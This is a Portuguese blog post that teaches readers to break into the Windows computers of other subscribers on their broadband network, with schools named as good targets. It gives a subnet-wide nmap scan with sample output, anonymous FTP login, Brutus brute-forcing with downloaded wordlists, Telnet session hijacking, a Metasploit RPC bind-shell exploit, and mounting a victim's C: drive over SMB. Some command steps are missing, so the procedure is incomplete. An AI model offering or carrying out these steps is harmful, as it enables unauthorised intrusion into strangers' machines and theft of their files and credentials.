Bom ensinarei como invadir usuários da sua banda larga.
Algumas banda largas como a minha antiga http://www.icnnet.com.br usam proxy, significa que todo mundo está em rede compartilhada que eu chamo de “Direta”, por exemplo se sua internet é de 1 MB e do seu amigo é de 1MB também e vocês trocam arquivos por Msn, Skype etc, a velocidade aumenta consideravelmente pois vocês estão em rede. É o melhor tipo de banda larga para invasão, se sua universidade, escola usa proxy exelente cobaia.
Existe também a banda larga como a minha atual http://www.bigtv.com.br que não tem proxy e os usuários não estão em rede compartilhada, se meu amigo tiver velocidade de 1MB e à minha velocidade for 1 MB e agente trocar arquivos por Msn, Skype a velocidade se mantém 1 MB.
Tendo um destes dois tipos de conexão poderemos invadir fácilmente um “Windows User”.
21: FTP
23: TELNET
135: RPC
445: COMPARTILHAMENTO
Para começar baixe o Nmap http://nmap.org/download.html
Agora para entender pegue seu ip exemplo;
seu ip é: 201.45.241.134 (Apague o último número e ponha o número um )
você deixa ele 201.45.241.1
agora abra o nmap e digite
nmap -sV -T Insane -A -v 201.45.241.1-254 -p21,23,135,445
Pronto vai listar todas as portas abertas de todos os usuários da sua banda larga ou do seu bairro, estado etc depende da sua banda.
Discovered open port 23/tcp on 201.45.241.1
Discovered open port 23/tcp on 201.45.241.186
Discovered open port 445/tcp on 201.45.241.14
Discovered open port 445/tcp on 201.45.241.97
Discovered open port 445/tcp on 201.45.241.24
Discovered open port 445/tcp on 201.45.241.152
Discovered open port 445/tcp on 201.45.241.149
Discovered open port 445/tcp on 201.45.241.81
Discovered open port 445/tcp on 201.45.241.69
Discovered open port 445/tcp on 201.45.241.9
Discovered open port 445/tcp on 201.45.241.55
Discovered open port 445/tcp on 201.45.241.113
Discovered open port 445/tcp on 201.45.241.218
Discovered open port 445/tcp on 201.45.241.21
Discovered open port 445/tcp on 201.45.241.107
Discovered open port 445/tcp on 201.45.241.111
Discovered open port 445/tcp on 201.45.241.56
Discovered open port 445/tcp on 201.45.241.178
Discovered open port 445/tcp on 201.45.241.191
Discovered open port 445/tcp on 201.45.241.157
Discovered open port 445/tcp on 201.45.241.127
Discovered open port 445/tcp on 201.45.241.29
Discovered open port 445/tcp on 201.45.241.207
Discovered open port 135/tcp on 201.45.241.175
Discovered open port 135/tcp on 201.45.241.164
Todos os Ip’s que tiverem a porta 21 aberta, você pode tentar se logar como anonymous
Iniciar>Executar>cmd>ftp>open>201.45.241.223>anonymous>a
porque geralmente úsuarios comuns não se preoculpam em configurar o FTP ou apagar o usuário “anonymos”
caso não tenha sucesso em anonymous use o BRUTUS;
http://www.4shared.com/file/47154004/9ba4bd9a/Brutus.html
e a WorldList
http://www.4shared.com/file/47154112/6a1e43d9/wordlist.html
Abra o Brutus escolha a opção FTP ponha o IP
extraia os 2 txt do RAR
e em Users ponha o txt admin.txt e em senha ponha o admin2.txt
e pronto.
Roubando a sessão TELNET baixe o Sterm
http://www.4shared.com/file/47154732/5ca55de9/sterm.html
abra ele clica em “Conect” ponha o ip da “vítima” com a porta 23 aberta e “Chazan” conexão é sua.
A porta 23 Telnet podemos usar exatamente igual na porta 21, e tentando Brutal Force.
A porta 135 RPC usaremos o Metasploit
http://www.metasploit.com/framework/
Inicie ele e procuro por MICROSOFT RPC ;
depois disso escola a opção GERENIC\SHELL_BLIND_TCP;
mantenha tudo padrão e ponha o ip da “vítima” se o Windows dele não for atualizado, ele já vem como Shell.
Bom essa porta é da compartilhamento
Comando concluído com êxito.
depois baixa o Dumpusers
http://www.4shared.com/file/47156153/d37c7ec0/dumpusers.html
ponha ele no C:\
abra o cmd digite;
depois você vai no;
Agora o C:\ do cara ta shared com você ; )
0 comentários:
Postar um comentário